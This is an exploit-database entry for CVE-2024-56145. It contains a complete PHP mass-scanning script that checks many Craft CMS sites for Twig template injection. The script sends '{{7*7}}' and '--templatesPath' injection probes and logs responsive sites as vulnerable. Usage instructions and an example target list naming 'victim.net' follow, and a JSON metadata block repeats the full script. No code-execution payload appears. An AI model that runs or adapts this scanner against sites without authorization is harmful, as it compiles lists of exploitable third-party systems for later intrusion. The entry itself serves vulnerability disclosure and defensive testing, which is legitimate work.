📄 Craft CMS 5.0 Twig Template Injection Scanner_PACKETSTORM:212864

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This is a mass scanning script for the Craft CMS version 5.0 Twig template injection vulnerability...

Visit Original Source

Basic Information

ID PACKETSTORM:212864

Published Dec 16, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Craft CMS 5.0 Twig Template Injection – Mass Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://craftcms.com |
=============================================================================================================================================

POC :

[+] Description : a Mass Scanner for detecting the Craft CMS Twig Template Injection vulnerability.
The scanner performs **NON-DESTRUCTIVE testing only**, without any RCE payloads.

(Related : https://packetstorm.news/files/cve/CVE-2024-56145 Related CVE numbers: CVE-2024-56145 ) .

[+] It detects vulnerable Craft CMS instances using:

1. **Twig mathematical evaluation**

Payload: `{{7*7}}` → Expected value: `49`

2. **templatesPath injection via GET argument**

Payload: `?--templatesPath=/RANDOM_NONCE`
Expected behavior: Echo of the nonce inside the server error trace.

[+] The scanner supports:

✔ Large-scale mass scanning
✔ Output file generation
✔ Safe detection
✔ Linux / Windows / macOS support

=============================================
# Proof-of-Concept (PHP Mass Scanner)
=============================================

<?php
/**
* Craft CMS Twig Injection – Mass Scanner
* Author : indoushka
*/

class CraftTwigMassScanner {

private array $targets;
private string $outputFile;

public function __construct(string $fileList, string $outputFile = "vulnerable.txt") {
if (!file_exists($fileList)) {
die("Targets file not found.\n");
}

$this->targets = array_filter(array_map("trim", file($fileList)));
$this->outputFile = $outputFile;
}

private function banner() {
echo "=============================================\n";
echo " Craft CMS Twig Injection – Mass Scanner\n";
echo " PoC by indoushka\n";
echo "=============================================\n\n";
}

private function http_get(string $url): string|false {
return @file_get_contents($url, false, stream_context_create([
"http" => [
"timeout" => 5,
"user_agent" => "Mozilla/5.0"
]
]));
}

private function test_injection(string $target): bool {
$probe = "{{7*7}}";
$encoded = urlencode($probe);

$url = rtrim($target, "/") . "/?template=" . $encoded;
$response = $this->http_get($url);

return ($response && str_contains($response, "49"));
}

private function test_template_path(string $target): bool {
$nonce = substr(md5(rand()), 0, 8);

$url = rtrim($target, "/") . "/?--templatesPath=/" . $nonce;
$response = $this->http_get($url);

return ($response && str_contains($response, $nonce));
}

private function save_vulnerable(string $target) {
file_put_contents($this->outputFile, $target . PHP_EOL, FILE_APPEND);
}

public function scan() {
$this->banner();

foreach ($this->targets as $target) {
echo "[*] Checking: $target\n";

$inj = $this->test_injection($target);
$path = $this->test_template_path($target);

if ($inj || $path) {
echo "[+] Vulnerable: $target\n";
$this->save_vulnerable($target);
} else {
echo "[-] Not vulnerable: $target\n";
}

echo "---------------------------------------------\n";
}

echo "\nScan completed.\n";
echo "Results saved in: {$this->outputFile}\n";
}
}

/* CLI */
if (php_sapi_name() === "cli") {
if (!isset($argv[1])) {
die("Usage: php mass.php targets.txt\n");
}

$scanner = new CraftTwigMassScanner($argv[1]);
$scanner->scan();
}
?>

====================
[+] Usage
====================

php mass.php targets.txt

Example targets.txt:
http://site1.com
https://example.org
http://victim.net

Output file:
vulnerable.txt

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-16T18:54:56",
    "description": "This is a mass scanning script for the Craft CMS version 5.0 Twig template injection vulnerability...",
    "published": "2025-12-16T00:00:00",
    "modified": "2025-12-16T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Craft CMS 5.0 Twig Template Injection Scanner",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212864",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2024-56145"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Craft CMS 5.0 Twig Template Injection \u2013 Mass Scanner                                                                        |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://craftcms.com                                                                                                        |\n    =============================================================================================================================================\n    \n    POC : \n    \n    [+] Description : a Mass Scanner for detecting the Craft CMS Twig Template Injection vulnerability.  \n                      The scanner performs **NON-DESTRUCTIVE testing only**, without any RCE payloads.  \n    \n    (Related : https://packetstorm.news/files/cve/CVE-2024-56145 Related CVE numbers:\tCVE-2024-56145 ) .\n    \n    [+] It detects vulnerable Craft CMS instances using:\n    \n    1. **Twig mathematical evaluation**  \n    \n       Payload: `{{7*7}}` \u2192 Expected value: `49`\n    \n    2. **templatesPath injection via GET argument**  \n    \n       Payload: `?--templatesPath=/RANDOM_NONCE`  \n       Expected behavior: Echo of the nonce inside the server error trace.\n    \n    [+] The scanner supports:\n    \n    \u2714 Large-scale mass scanning  \n    \u2714 Output file generation  \n    \u2714 Safe detection  \n    \u2714 Linux / Windows / macOS support  \n    \n    =============================================\n    # Proof-of-Concept (PHP Mass Scanner)\n    =============================================\n    \n    <?php\n    /**\n     * Craft CMS Twig Injection \u2013 Mass Scanner \n     * Author : indoushka\n     */\n    \n    class CraftTwigMassScanner {\n    \n        private array $targets;\n        private string $outputFile;\n    \n        public function __construct(string $fileList, string $outputFile = \"vulnerable.txt\") {\n            if (!file_exists($fileList)) {\n                die(\"Targets file not found.\\n\");\n            }\n    \n            $this->targets = array_filter(array_map(\"trim\", file($fileList)));\n            $this->outputFile = $outputFile;\n        }\n    \n        private function banner() {\n            echo \"=============================================\\n\";\n            echo \" Craft CMS Twig Injection \u2013 Mass Scanner\\n\";\n            echo \" PoC by indoushka\\n\";\n            echo \"=============================================\\n\\n\";\n        }\n    \n        private function http_get(string $url): string|false {\n            return @file_get_contents($url, false, stream_context_create([\n                \"http\" => [\n                    \"timeout\" => 5,\n                    \"user_agent\" => \"Mozilla/5.0\"\n                ]\n            ]));\n        }\n    \n        private function test_injection(string $target): bool {\n            $probe = \"{{7*7}}\";\n            $encoded = urlencode($probe);\n    \n            $url = rtrim($target, \"/\") . \"/?template=\" . $encoded;\n            $response = $this->http_get($url);\n    \n            return ($response && str_contains($response, \"49\"));\n        }\n    \n        private function test_template_path(string $target): bool {\n            $nonce = substr(md5(rand()), 0, 8);\n    \n            $url = rtrim($target, \"/\") . \"/?--templatesPath=/\" . $nonce;\n            $response = $this->http_get($url);\n    \n            return ($response && str_contains($response, $nonce));\n        }\n    \n        private function save_vulnerable(string $target) {\n            file_put_contents($this->outputFile, $target . PHP_EOL, FILE_APPEND);\n        }\n    \n        public function scan() {\n            $this->banner();\n    \n            foreach ($this->targets as $target) {\n                echo \"[*] Checking: $target\\n\";\n    \n                $inj = $this->test_injection($target);\n                $path = $this->test_template_path($target);\n    \n                if ($inj || $path) {\n                    echo \"[+] Vulnerable: $target\\n\";\n                    $this->save_vulnerable($target);\n                } else {\n                    echo \"[-] Not vulnerable: $target\\n\";\n                }\n    \n                echo \"---------------------------------------------\\n\";\n            }\n    \n            echo \"\\nScan completed.\\n\";\n            echo \"Results saved in: {$this->outputFile}\\n\";\n        }\n    }\n    \n    /* CLI */\n    if (php_sapi_name() === \"cli\") {\n        if (!isset($argv[1])) {\n            die(\"Usage: php mass.php targets.txt\\n\");\n        }\n    \n        $scanner = new CraftTwigMassScanner($argv[1]);\n        $scanner->scan();\n    }\n    ?>\n    \n    ====================\n    [+] Usage\n    ====================\n    \n    php mass.php targets.txt\n    \n    Example targets.txt:\n    http://site1.com\n    https://example.org\n    http://victim.net\n    \n    Output file:\n    vulnerable.txt\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212864",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212864/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply